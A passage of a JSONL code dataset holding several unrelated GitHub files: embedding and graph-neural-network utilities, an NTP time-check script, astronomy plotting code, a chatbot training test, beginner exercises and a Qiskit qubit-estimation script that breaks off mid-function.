[]\n label_Ids = []\n doc_id = \"\"\n return instance_texts, instance_Ids\n\n\ndef build_pretrain_embedding(embedding_path, word_alphabet, embedd_dim=100, norm=True):\n embedd_dict = dict()\n if embedding_path != None:\n embedd_dict, embedd_dim = load_pretrain_emb(embedding_path)\n alphabet_size = word_alphabet.size()\n scale = np.sqrt(3.0 / embedd_dim)\n pretrain_emb = np.empty([word_alphabet.size(), embedd_dim])\n perfect_match = 0\n case_match = 0\n not_match = 0\n for word, index in word_alphabet.iteritems():\n if word in embedd_dict:\n if norm:\n pretrain_emb[index,:] = norm2one(embedd_dict[word])\n else:\n pretrain_emb[index,:] = embedd_dict[word]\n perfect_match += 1\n elif word.lower() in embedd_dict:\n if norm:\n pretrain_emb[index,:] = norm2one(embedd_dict[word.lower()])\n else:\n pretrain_emb[index,:] = embedd_dict[word.lower()]\n case_match += 1\n else:\n pretrain_emb[index,:] = np.random.uniform(-scale, scale, [1, embedd_dim])\n not_match += 1\n pretrained_size = len(embedd_dict)\n print(\"Embedding:\\n pretrain word:%s, prefect match:%s, case_match:%s, oov:%s, oov%%:%s\"%(pretrained_size, perfect_match, case_match, not_match, (not_match+0.)/alphabet_size))\n return pretrain_emb, embedd_dim\n\ndef norm2one(vec):\n root_sum_square = np.sqrt(np.sum(np.square(vec)))\n return vec/root_sum_square\n\ndef load_pretrain_emb(embedding_path):\n embedd_dim = -1\n embedd_dict = dict()\n with open(embedding_path, 'r', encoding=\"utf8\") as file:\n for line in file:\n line = line.strip()\n if len(line) == 0:\n continue\n tokens = line.split()\n if embedd_dim < 0:\n embedd_dim = len(tokens) - 1\n elif embedd_dim + 1 != len(tokens):\n ## ignore illegal embedding line\n continue\n # assert (embedd_dim + 1 == len(tokens))\n embedd = np.empty([1, embedd_dim])\n embedd[:] = tokens[1:]\n if sys.version_info[0] < 3:\n first_col = tokens[0].decode('utf-8')\n else:\n first_col = tokens[0]\n embedd_dict[first_col] = embedd\n return embedd_dict, embedd_dim\n\nif __name__ == '__main__':\n a = np.arange(9.0)\n print(a)\n print(norm2one(a))\n","repo_name":"xinyadu/doc_event_role","sub_path":"model/code/utils/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"22"} +{"seq_id":"41313197947","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport dgl\nimport dgl.function as fn\nimport dgl.nn.pytorch as dglnn\n\n\ndef disable_grad(module):\n for param in module.parameters():\n param.requires_grad = False\n\n\ndef _init_input_modules(g, ntype, textset, hidden_dims):\n '''\n 给每个item特征,独立设置embedding。可以根据g中特征的原始值,lookup\n ----------\n ntype:只考虑这类节点的特征。(这里传入item类节点的类型名)\n ----------\n module_dict[f_name]:\n f是int64类型的特征: 默认是labelencoder后的离散特征。对应一个[C,h]的embedding\n f是float类型特征: 对应一个Linear层。输入默认是[B,d], 经过该Linear成为[B,h]的layer\n '''\n # We initialize the linear projections of each input feature ``x`` as\n # follows:\n # * If ``x`` is a scalar integral feature, we assume that ``x`` is a categorical\n # feature, and assume the range of ``x`` is 0..max(x).\n # * If ``x`` is a float one-dimensional feature, we assume that ``x`` is a\n # numeric vector.\n # * If ``x`` is a field of a textset, we process it as bag of words.\n module_dict = nn.ModuleDict()\n\n for column, data in g.nodes[ntype].data.items(): # item类节点的所有特征. data是所有节点的特征取值(数据处理时,设置在train_g中)\n if column == dgl.NID:\n continue\n if data.dtype == torch.float32:\n assert data.ndim == 2\n m = nn.Linear(data.shape[1], hidden_dims) # 作为连续特征,对应一个Linear层\n nn.init.xavier_uniform_(m.weight)\n nn.init.constant_(m.bias, 0)\n module_dict[column] = m\n elif data.dtype == torch.int64: # 作为离散特征,对应一个embedding [C,h]\n assert data.ndim == 1\n m = nn.Embedding(data.max() + 2, hidden_dims, padding_idx=-1)\n nn.init.xavier_uniform_(m.weight)\n module_dict[column] = m\n\n if textset is not None:\n for column, field in textset.items():\n textlist, vocab, pad_var, batch_first = field\n module_dict[column] = BagOfWords(vocab, hidden_dims)\n\n return module_dict\n\n\nclass BagOfWords(nn.Module):\n def __init__(self, vocab, hidden_dims):\n super().__init__()\n\n self.emb = nn.Embedding(\n len(vocab.get_itos()),\n hidden_dims,\n padding_idx=vocab.get_stoi()[\"\"],\n )\n nn.init.xavier_uniform_(self.emb.weight)\n\n def forward(self, x, length):\n return self.emb(x).sum(1) / length.unsqueeze(1).float()\n\n\nclass LinearProjector(nn.Module):\n \"\"\"\n Projects each input feature of the graph linearly and sums them up\n \"\"\"\n\n def __init__(self, full_graph, ntype, textset, hidden_dims):\n '''\n 初始化g中每个特征的映射层,得到module_dict[f_name]\n 每个int64类型的特征f: 默认是labelencoder后的离散特征。初始化一个[C,h]的embedding\n 每个float类型特征f: 默认原特征是[B,d]的连续特征, 初始化一个(d,h)的Linear层\n -----\n ntype:只考虑该类型节点的特征 (item特征)\n '''\n super().__init__()\n\n self.ntype = ntype\n self.inputs = _init_input_modules(\n full_graph, ntype, textset, hidden_dims # module_dict[f_name]. 对应每个特征的映射层\n )\n\n def forward(self, ndata):\n '''\n ndata: 某个block中,对应节点的原始特征 ,是一个dict: {f_name:tensor[]}\n ----------\n 每个特征,映射成一个h后。直接相加\n '''\n projections = []\n for feature, data in ndata.items(): # block中。节点对应的每个特征。data:各节点上的特征取值,tensor.\n if feature == dgl.NID or feature.endswith(\"__len\"):\n # This is an additional feature indicating the length of the ``feature``\n # column; we shouldn't process this.\n continue\n\n module = self.inputs[feature] # 该特征对应的初始映射层\n if isinstance(module, BagOfWords):\n # Textual feature; find the length and pass it to the textual module.\n length = ndata[feature + \"__len\"]\n result = module(data, length)\n else:\n result = module(data) # 原始特征,经过embedd/Linear: (B,) -> (B,h)\n projections.append(result)\n\n return torch.stack(projections, 1).sum(1) # 简单把每种特征向量相加 stack: (B,|F|,h) ->sum (B,h)\n\n\nclass WeightedSAGEConv(nn.Module):\n '''\n 每层网络:聚合该层邻居\n '''\n def __init__(self, input_dims, hidden_dims, output_dims, act=F.relu):\n super().__init__()\n\n self.act = act\n self.Q = nn.Linear(input_dims, hidden_dims)\n self.W = nn.Linear(input_dims + hidden_dims, output_dims)\n self.reset_parameters()\n self.dropout = nn.Dropout(0.5)\n\n def reset_parameters(self):\n gain = nn.init.calculate_gain(\"relu\")\n nn.init.xavier_uniform_(self.Q.weight, gain=gain)\n nn.init.xavier_uniform_(self.W.weight, gain=gain)\n nn.init.constant_(self.Q.bias, 0)\n nn.init.constant_(self.W.bias, 0)\n\n def forward(self, g, h, weights):\n \"\"\"\n g: 一个block。只包含本层节点和下一阶邻居。 邻居节点指向seeds. 构建block时,源节点包含dst节点。\n h: 本层block的每个节点,通过上一层得到的向量\n weights:该block中,邻居节点到目标节点的权重。代表邻居采样时,该邻居节点的重要性. 是取值,tensor(|E|,1)\n 返回:本次block的目标节点,对应的新的表示z (B,h)\n \"\"\"\n h_src, h_dst = h # h_src:该block中源节点的current embedding。\n # h_dst:该block中目标节点的current embedding。包含在h_src中\n with g.local_scope():\n # 源节点hv本身做变换:\n # h_v=Relu(Q*h_v+q) 仍是h维。相当于map,设为源节点的特征'n'\n g.srcdata[\"n\"] = self.act(self.Q(self.dropout(h_src)))\n\n # 为目标节点,加权聚合邻居节点(按邻居权重). 用dgl中内置的消息传递api,更新节点特征\n # h_u= sum(w*h_v)。 相当于每个dst节点,加权reduce\n g.edata[\"w\"] = weights.float() # 邻居权重,作为边特征\n g.update_all(fn.u_mul_e(\"n\", \"w\", \"m\"), # 每条边的源节点中特征'n'(含dst节点), 乘上对应边权重'w',产生消息“m”(在该边上,作为新的边特征).\n fn.sum(\"m\", \"n\")) # 目标节点的特征'n',更新为加权聚合所有邻居的h_v: h_u= sum(w*h_v) (每个dst节点,聚合所有入边消息m)\n n = g.dstdata[\"n\"] # 把目标节点的新表示,拿出来,准备做归一化。对应文中n_u [B,h]\n\n g.update_all(fn.copy_e(\"w\", \"m\"), fn.sum(\"m\", \"ws\")) # 每个dst节点,聚合所有入边权重,用来归一化n_u (原始w是访问次数,未归一化)\n ws = g.dstdata[\"ws\"].unsqueeze(1).clamp(min=1) # 融合每条边上的消息m(来自w),存入dst节点的'ws'字段,作为节点特征(ws)\n\n # 加自己的初始embed:z_u= Relu(W * (concat[n_u,h_u]) + b)\n z = self.act(self.W(self.dropout(torch.cat([n / ws, h_dst], 1)))) # [B,h] 拼上自己后,又通过W,映射到h\n z_norm = z.norm(2, 1, keepdim=True)\n z_norm = torch.where(\n z_norm == 0, torch.tensor(1.0).to(z_norm), z_norm\n )\n z = z / z_norm # 归一化。得到本次block的目标节点,对应的新的表示\n return z\n\n\nclass SAGENet(nn.Module):\n def __init__(self, hidden_dims, n_layers):\n \"\"\"\n 核心模型:含每层conv\n \"\"\"\n super().__init__()\n\n self.convs = nn.ModuleList()\n for _ in range(n_layers):\n self.convs.append(\n WeightedSAGEConv(hidden_dims, hidden_dims, hidden_dims)\n )\n\n def forward(self, blocks, h):\n '''\n Args:\n blocks: 已经采样好的各阶节点\n 每个block子图,只含本阶节点和下一阶邻居。每个邻居指向对应seeds:\n blocks[-1]: 初始B个item作为seeds, 每个节点采样n个邻居,得到一个只含seeds和一阶邻居节点的二分图block。\n blocks[-2]: 用上次采样得到的一阶邻居,作为新的seeds,再采样,得到只含一二阶邻居的二分图block\n ...\n blocks[0]: 放最后一阶邻居对应的子图。从最后一阶邻居开始聚合\n h: 最后一阶邻居对应的block。源节点的原始特征聚合后,得到的初始embedding。每个block的源节点包含dst节点(位于前dst个)\n Returns:\n blocks中的输入节点,经过多次conv聚合后的表示:(B,h)\n '''\n for layer, block in zip(self.convs, blocks): # 每层layer\n h_dst = h[: block.num_nodes(\"DST/\" + block.ntypes[0])] # 本次block中,目标节点的初始向量 (位于block源节点的前|dst|个位置)\n h = layer(block, (h, h_dst), block.edata[\"weights\"]) # 得到本次block的目标节点,对应的新的向量表示z. 赋给h\n # 本次的目标节点,是下次block的源节点。z作为下一个block的src,去聚合更上层的节点表示。\n return h # 最原始的输入节点,聚合n层邻居后的表示:(B,h)\n\n\nclass ItemToItemScorer(nn.Module):\n def __init__(self, full_graph, ntype):\n '''\n Parameters\n ----------\n full_graph: 完整的图\n ntype: 只考虑item类型的节点。子图是只有item节点的同质图。\n '''\n super().__init__()\n\n n_nodes = full_graph.num_nodes(ntype) # g中item节点总数\n self.bias = nn.Parameter(torch.zeros(n_nodes, 1)) # 每个节点学习一个bias\n\n def _add_bias(self, edges:dgl.udf.EdgeBatch): # 自定义的消息传递函数。\n \"edges,本质是一批edge。可以通过src, dst,data属性来获取u,v节点特征,边特征\"\n bias_src = self.bias[edges.src[dgl.NID]] # 源节点的bias\n bias_dst = self.bias[edges.dst[dgl.NID]] # 目标节点的bias\n return {\"s\": edges.data[\"s\"] + bias_src + bias_dst} # 最终的head->tail的边权重,加上学习到的节点本身的bias\n\n def forward(self, item_item_graph, h):\n \"\"\"\n item_item_graph : pos_graph/neg_graph. 只包含B个head->tail边的子图。但compact后,每个子图都含另一个子图的节点。共3B个节点\n h : heads, tails, neg_tails,3B个节点,每个节点经过网络后的最终表示。(3B,h)\n -----\n Returns:\n pair_score :该子图中的B个pair(head->tail),根据最终表示h间的向量内积,得到B对节点的节点间相似度(B,1)\n \"\"\"\n with item_item_graph.local_scope():\n item_item_graph.ndata[\"h\"] = h # 把h设成子图节点的特征。\n item_item_graph.apply_edges(fn.u_dot_v(\"h\", \"h\", \"s\")) # 用消息传递api,计算边head和tail的特征's'(是head、tail的向量内积)\n item_item_graph.apply_edges(self._add_bias) # 该分数,加上一个可学习的bias,是每个pair的最终score (TODO:可以不用)\n pair_score = item_item_graph.edata[\"s\"]\n return pair_score # 该子图中,B个pair根据向量内积得到的相似度\n","repo_name":"Xuweijia-buaa/dgl","sub_path":"examples/pytorch/pinsage/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":12003,"program_lang":"python","lang":"zh","doc_type":"code","dataset":"github-code","pt":"22"} +{"seq_id":"37002378790","text":"#Program for system time clock sync\n\n\"\"\"\nRequires Internet Connection\n\nReference\nhttps://pypi.org/project/ntplib/\n\n\"\"\"\n\n\"\"\"\nDevansh Shukla\n\n\"\"\"\n\nimport os\nimport ntplib # pip3 install ntplib\nfrom datetime import datetime, timezone\n\ndef sys_sync_():\n\n try:\n\n print(\"Connecting to NTP Server\")\n \n os.system(\"sudo ntpdate -d -u -q time.nplindia.org\")\n\n print(\"System Time Synced\\n\")\n\n except:\n\n print(\"Required Internet Connection\")\n\n exit(0)\n\ndef check_sync():\n\n try:\n\n #print(\"\\n Connecting to NTP Server\")\n c = ntplib.NTPClient()\n # Provide the respective ntp server ip in below function\n response = c.request('time.nplindia.org', version=3)\n #print(response.offset) \n #print(ntplib.leap_to_text(response.leap))\n\n server_time = datetime.fromtimestamp(response.tx_time) \n current_time = datetime.now()\n\n t1 = server_time.timestamp()\n \n #print(t1)\n t2 = current_time.timestamp()\n #print(t2)\n\n global __t__\n __t__ = t2 - t1 # System Time - Server Time\n\n #print(\"Difference in Sync is \" , __t__ , \"s\")\n\n except:\n\n print(\"Required Internet Connection\")\n\n exit(0)\n\n__t__ = 0.5\n\n#while(abs(__t__) >= 0.5):\n \nsys_sync_()\n\ncheck_sync()\n\nprint(\"Difference in Sync is \" , __t__ , \"s \" , \"(SysT - ServerT)\\n\")\n\ncorrected_time = datetime.now().timestamp() - __t__\n\n\n","repo_name":"devanshshukla99/SAS","sub_path":"sys_sync_ntpdate.py","file_name":"sys_sync_ntpdate.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"35498730749","text":"import copy\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\n\nfrom lenstronomy.Util.package_util import exporter\n\nexport, __all__ = exporter()\n\n\n@export\ndef plot_chain_list(chain_list, index=0, num_average=100):\n \"\"\"Plots the output of a chain of samples (MCMC or PSO) with the some diagnostics of\n convergence. This routine is an example and more tests might be appropriate to\n analyse a specific chain.\n\n :param chain_list: list of chains with arguments [type string, samples etc...]\n :param index: index of chain to be plotted\n :param num_average: in chains, number of steps to average over in plotting diagnostics\n :return: plotting instance figure, axes (potentially multiple)\n \"\"\"\n chain_i = chain_list[index]\n chain_type = chain_i[0]\n if chain_type == \"PSO\":\n chain, param = chain_i[1:]\n f, axes = plot_chain(chain, param)\n elif chain_type in [\"MCMC\", \"emcee\", \"zeus\"]:\n samples, param, dist = chain_i[1:]\n f, ax = plt.subplots(1, 1, figsize=(6, 6))\n axes = plot_mcmc_behaviour(ax, samples, param, dist, num_average=num_average)\n elif chain_type in [\"dynesty\", \"dyPolyChord\", \"MultiNest\"]:\n samples, param, dist = chain_i[1:4]\n f, ax = plt.subplots(1, 1, figsize=(6, 6))\n axes = plot_mcmc_behaviour(ax, samples, param, dist, num_average=num_average)\n else:\n raise ValueError(\"chain_type %s not supported for plotting\" % chain_type)\n return f, axes\n\n\n@export\ndef plot_chain(chain, param_list):\n chi2_list, pos_list, vel_list = chain\n\n f, axes = plt.subplots(1, 3, figsize=(18, 6))\n ax = axes[0]\n ax.plot(np.log10(-np.array(chi2_list)))\n ax.set_title(\"-logL\")\n\n ax = axes[1]\n pos = np.array(pos_list)\n vel = np.array(vel_list)\n n_iter = len(pos)\n plt.figure()\n for i in range(0, len(pos[0])):\n ax.plot(\n (pos[:, i] - pos[n_iter - 1, i]) / (pos[n_iter - 1, i] + 1),\n label=param_list[i],\n )\n ax.set_title(\"particle position\")\n ax.legend()\n\n ax = axes[2]\n for i in range(0, len(vel[0])):\n ax.plot(vel[:, i] / (pos[n_iter - 1, i] + 1), label=param_list[i])\n ax.set_title(\"param velocity\")\n ax.legend()\n return f, axes\n\n\n@export\ndef plot_mcmc_behaviour(ax, samples_mcmc, param_mcmc, dist_mcmc=None, num_average=100):\n \"\"\"Plots the MCMC behaviour and looks for convergence of the chain.\n\n :param ax: matplotlib.axis instance\n :param samples_mcmc: parameters sampled 2d numpy array\n :param param_mcmc: list of parameters\n :param dist_mcmc: log likelihood of the chain\n :param num_average: number of samples to average (should coincide with the number of\n samples in the emcee process)\n :return:\n \"\"\"\n num_samples = len(samples_mcmc[:, 0])\n num_average = int(num_average)\n n_points = int((num_samples - num_samples % num_average) / num_average)\n for i, param_name in enumerate(param_mcmc):\n samples = samples_mcmc[:, i]\n samples_averaged = np.average(\n samples[: int(n_points * num_average)].reshape(n_points, num_average),\n axis=1,\n )\n end_point = np.mean(samples_averaged)\n samples_renormed = (samples_averaged - end_point) / np.std(samples_averaged)\n ax.plot(samples_renormed, label=param_name)\n\n if dist_mcmc is not None:\n dist_averaged = -np.max(\n dist_mcmc[: int(n_points * num_average)].reshape(n_points, num_average),\n axis=1,\n )\n dist_normed = (dist_averaged - np.max(dist_averaged)) / (\n np.max(dist_averaged) - np.min(dist_averaged)\n )\n ax.plot(dist_normed, label=\"logL\", color=\"k\", linewidth=2)\n ax.legend()\n return ax\n\n\n@export\ndef psf_iteration_compare(kwargs_psf, **kwargs):\n \"\"\"\n\n :param kwargs_psf: keyword arguments that initiate a PSF() class\n :param kwargs: kwargs to send to matplotlib.pyplot.matshow()\n :return:\n \"\"\"\n psf_out = kwargs_psf[\"kernel_point_source\"]\n psf_in = kwargs_psf[\"kernel_point_source_init\"]\n # psf_error_map = kwargs_psf.get('psf_error_map', None)\n from lenstronomy.Data.psf import PSF\n\n psf = PSF(**kwargs_psf)\n # psf_out = psf.kernel_point_source\n psf_error_map = psf.psf_error_map\n n_kernel = len(psf_in)\n delta_x = n_kernel / 20.0\n delta_y = n_kernel / 10.0\n\n if \"cmap\" not in kwargs:\n kwargs[\"cmap\"] = \"seismic\"\n\n n = 3\n if psf_error_map is not None:\n n += 1\n f, axes = plt.subplots(1, n, figsize=(5 * n, 5))\n ax = axes[0]\n im = ax.matshow(np.log10(psf_in), origin=\"lower\", **kwargs)\n v_min, v_max = im.get_clim()\n if \"vmin\" not in kwargs:\n kwargs[\"vmin\"] = v_min\n if \"vmax\" not in kwargs:\n kwargs[\"vmax\"] = v_max\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"Initial PSF model\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n ax = axes[1]\n im = ax.matshow(np.log10(psf_out), origin=\"lower\", **kwargs)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"iterative reconstruction\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n ax = axes[2]\n kwargs_new = copy.deepcopy(kwargs)\n\n del kwargs_new[\"vmin\"]\n del kwargs_new[\"vmax\"]\n\n im = ax.matshow(\n psf_out - psf_in, origin=\"lower\", vmin=-(10**-3), vmax=10**-3, **kwargs_new\n )\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"difference\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n if psf_error_map is not None:\n ax = axes[3]\n im = ax.matshow(\n np.log10(psf_error_map * psf.kernel_point_source**2),\n origin=\"lower\",\n **kwargs\n )\n n_kernel = len(psf_error_map)\n delta_x = n_kernel / 20.0\n delta_y = n_kernel / 10.0\n divider = make_axes_locatable(ax)\n cax = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n plt.colorbar(im, cax=cax)\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax.text(\n delta_x,\n n_kernel - delta_y,\n \"psf error map\",\n color=\"k\",\n fontsize=20,\n backgroundcolor=\"w\",\n )\n\n f.tight_layout()\n return f, axes\n","repo_name":"lenstronomy/lenstronomy","sub_path":"lenstronomy/Plots/chain_plot.py","file_name":"chain_plot.py","file_ext":"py","file_size_in_byte":6980,"program_lang":"python","lang":"en","doc_type":"code","stars":164,"dataset":"github-code","pt":"22"} +{"seq_id":"13755503621","text":"import json\n\n\n# =====================================================================\n\n\ndef t_dict_save(file_path, dict):\n if isinstance(dict, str):\n dict = eval(dict)\n with open(file_path, 'w', encoding='utf-8') as f:\n str_ = json.dumps(dict, ensure_ascii=False)\n f.write(str_)\n\n\ndef t_dict_load(file_path):\n dict = {}\n with open(file_path, 'r', encoding='utf-8') as f:\n data = f.readline().strip()\n dict = json.loads(data)\n return dict","repo_name":"cxm2048/dave","sub_path":"Project/Python/project/public/tools/t_dict.py","file_name":"t_dict.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"21723894251","text":"from chatterbot import ChatBot\nimport sys\nfrom threading import Thread\nimport string\nimport random\n\ndef random_string(length):\n return ''.join(random.choice(string.ascii_letters) for m in range(length))\n\ndef trainThread(i, length):\n chatbot = ChatBot(\n 'Throughput-bot-'+str(i),\n trainer='chatterbot.trainers.ListTrainer'\n )\n print(\"start train \"+chatbot.name)\n trainSet = [random_string(16) for i in range(length)]\n for i in range(length):\n chatbot.train(trainSet)\n\nif __name__ == \"__main__\":\n length = int(sys.argv[1])\n width = int(sys.argv[2])\n print(\"Run throughput with %d threads of size %d\" % (width, length))\n threads = []\n for i in range(width):\n threads.append(Thread(target=trainThread, args=(i, length), name=str(i)))\n\n for thread in threads:\n thread.start()\n\n for thread in threads:\n thread.join()\n","repo_name":"wlwlw/achatbot","sub_path":"trainTest.py","file_name":"trainTest.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"34001705228","text":"# Ask the user for three input\nyear = int(input('Insert the year: '))\nmonth = int(input('Insert the month: '))\nday = int(input('Insert the day: '))\n\n# Define months lists and new year, month, day variables\nmonth_30 = [4, 6, 9, 11]\nmonth_31 = [1, 3, 5, 7, 8, 10]\ndecember = 12\nfebruary = 2\nnew_year = year\nnew_month = month\nnew_day = day\n\ndef change_day(day):\n new_day = day + 1\n return new_day\n\n# Create a function to change month (and year in case of December)\ndef change_month(month, year):\n if month == 12:\n new_day = 1\n new_month = 1\n new_year = year + 1\n\n else: \n new_day = 1\n new_month = month + 1\n new_year = year\n \n return new_day, new_month, new_year\n \n\ndef my_fun(new_year, new_month, new_day):\n # Define the possibilties with February and leap years with appropriate\n # error message\n if month == february:\n if year % 400 == 0 or (year % 100 != 0 and year % 4 == 0):\n if day == 29:\n new_day, new_month, new_year = change_month(month, year)\n elif day <= 28:\n new_day = change_day(day)\n elif day == 28:\n new_day, new_month, new_year = change_month(month, year)\n else:\n if day > 28:\n print('ERROR! this is not a leap year')\n elif day <= 0:\n print('ERROR! maybe this date does not exist')\n return \n \n # Define the possibilties with 30-day months with appropriate error message \n elif month in month_30:\n if day == 30:\n new_day, new_month, new_year = change_month(month, year)\n elif day <=0 or day > 30:\n print('ERROR! maybe this date does not exist')\n return\n else:\n new_day = change_day(day)\n\n # Define the possibilties with 31-day months with appropriate error message\n elif month in month_31: \n if day == 31:\n new_day, new_month, new_year = change_month(month, year)\n elif day <=0 or day > 31:\n print('ERROR! maybe this date does not exist')\n return\n else:\n new_day = change_day(day)\n\n # Define the possibilties with December and new year \n # with appropriate error message\n elif month == december:\n if day == 31:\n new_day, new_month, new_year = change_month(month, year) \n print('HAPPY NEW YEAR!!!')\n elif day <=0 or day > 31:\n print('ERROR! maybe this date does not exist') \n return \n else:\n print('ERROR! maybe this date does not exist') \n return \n\n # Format the output of days and months\n format_day = '{:02d}'.format(new_day)\n format_month = '{:02d}'.format(new_month)\n\n # Display the output\n print('Tomorrow will be ' + str(new_year) + '-' + str(format_month) + '-' + str(format_day))\n\nmy_fun(year, month, day)","repo_name":"AlexCartura/Tomorrowdevs","sub_path":"programming-basics/projects/m1/016-next-day/solutions/stefanocroci/sol_016_next_day.py","file_name":"sol_016_next_day.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24633710285","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport time as t\nfrom random import randint\nimport plotly.express as px\nimport re\n\nbot_bound = 0\ntop_bound = 100\n\n\n# In[2]:\n\n\ndef binary_search(data: list, number: int):\n\n mid = len(data) // 2\n low = 0\n high = len(data) - 1\n start_time = t.time()\n \n data.sort()\n \n while data[mid] != number and low <= high:\n if number > data[mid]:\n low = mid + 1\n else:\n high = mid - 1\n mid = (low + high) // 2\n\n if low > high:\n print(\"Ключ не найден\")\n else:\n print(f\"Ключ {mid} найден\")\n \n finish_time = t.time()\n \n return finish_time - start_time\n\n# = 1 + 3*(n-1) + (n-1)*f(Цикл for по j) = 1 + 3*(n-1) + (n-1)*(1 + 3*(n-1) + (n-1)*(2+2+1+2+2+2+2+1)) =\n# = 1+3n-3+(n-1)*(1+3n-3+14n-14)=-2+3n+(n-1)*(17n-16)=2 + 3n + 17n^2 - 33*n + 16 = 17n^2 - 30*n + 18\n\n# = 1 + 3*n + n*f(Цикл while)=1 + 3*n + n*()= 14*n+1\n\n# = 1\n\n\n#17n^2 + -16n + 20\n\n\n# In[3]:\n\n\narray = [randint(0,100) for _ in range(20)]\ntime = binary_search(array, 100)\nprint(f\"Время выполнения алгоритма: {time} секунд\")\n\n\n# In[4]:\n\n\ndef evaluate_results(repetitions: int) -> list:\n results = []\n n=0\n for _ in range(repetitions):\n n+=5000\n data = [randint(0,100) for _ in range(n)]\n random_number=randint(0,1000)\n start_time = t.time()\n evaluated_time = binary_search(data, random_number)\n finish_time = t.time()\n results.append((n, evaluated_time))\n return results\n\n\n# In[5]:\n\n\ndef build_chart(raw):\n chart_data = []\n\n for (n, time) in raw:\n chart_data.append(\n dict(\n size=n,\n evaluation=time\n )\n )\n fig = px.line(chart_data, x=\"size\", y=\"evaluation\")\n fig.show()\n\n\n# In[8]:\n\n\nbuild_chart(sorted(evaluate_results(100), key=lambda tup: tup[0]))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"PetraSChka/algorith","sub_path":"lab4/lab4.py","file_name":"lab4.py","file_ext":"py","file_size_in_byte":2001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"12424532056","text":"## Graphical comparison between estimation in HELMI and IBMQ\n## Imports\nimport sys\nimport argparse\nfrom argparse import RawTextHelpFormatter\n\nfrom qiskit import QuantumRegister, QuantumCircuit, ClassicalRegister, Aer, BasicAer, execute\nfrom qiskit.compiler import transpile\nfrom qiskit.dagcircuit import DAGCircuit\nfrom qiskit.converters import circuit_to_dag\nfrom qiskit.visualization import plot_bloch_vector\nfrom qiskit.quantum_info import state_fidelity\nfrom qiskit.transpiler.passes import RemoveBarriers\nfrom qiskit import IBMQ\n\nimport matplotlib.pyplot as plt\nimport numpy as np\npi = np.pi\nj = complex(0,1)\n\ndef get_args():\n\n args_parser = argparse.ArgumentParser(\n description=\"\"\"Qubit state estimation\"\"\",\n formatter_class=RawTextHelpFormatter,\n epilog=\"\"\"Example usage:\n python Plus_estim.py --backend simulator\n \"\"\",\n )\n\n # Parse Arguments\n\n args_parser.add_argument(\n \"--backend\",\n help=\"\"\"\n Define the backend for running the program.\n 'aer'/'simulator' runs on Qiskit's aer simulator,\n 'helmi' runs on VTT Helmi Quantum Computer,\n 'fake_helmi' runs in the fake helmi simulator\n \"\"\",\n required=False,\n type=str,\n default=None,\n choices=[\"helmi\", \"simulator\", \"IBMQ\", \"fake_helmi\"],\n )\n\n\n return args_parser.parse_args()\n\ndef Initialization(angles = [0,0,0]):\n\n qr = QuantumRegister(3)\n qc = QuantumCircuit(qr)\n\n #Initialice qubits\n qc.h(qr[0]) #A meter\n qc.h(qr[2]) #B meter\n qc.u(angles[0],angles[1],angles[2],[qr[1]]) #System\n\n Init_gate = qc.to_gate()\n Init_gate.name= \"Initialization\"\n\n return Init_gate\n\ndef U_operator(A=[0,0,0,0,0,0],B=[0,0,0,0,0,0]):\n\n ## A y B are vectors with the rotation angles of the meters A y B\n qr = QuantumRegister(3)\n qc = QuantumCircuit(qr)\n\n #####==================================#####\n #####======= Evolution operator =======#####\n #####==================================#####\n\n\n\n ## We apply rotations around a CNOT between the S and A qubits\n qc.u(A[0],A[1],A[2],qr[0])\n qc.cx(qr[1],qr[0])\n qc.u(A[3],A[4],A[5],qr[0])\n\n\n ## We change the basis of the S qubit\n qc.h(qr[1])\n\n ## Now, we apply rotations around a CNOT between the S and B qubits\n qc.u(B[0],B[1],B[2],qr[2])\n qc.cx(qr[1],qr[2])\n qc.u(B[3],B[4],B[5],qr[2])\n\n ## We revert the hadamard transformation over S\n qc.h(qr[1])\n\n U_gate=qc.to_gate()\n U_gate.name=\"U Operator\"\n\n return U_gate\n\ndef U_matrix(angles_a,angles_b):\n ## Definimos los qubits sobre los que actúa la compuerta\n A = QuantumRegister(1,'a')\n S = QuantumRegister(1,'s')\n B = QuantumRegister(1,'b')\n cr = ClassicalRegister(3)\n\n ## Ejecutamos la compuerta sobre estos 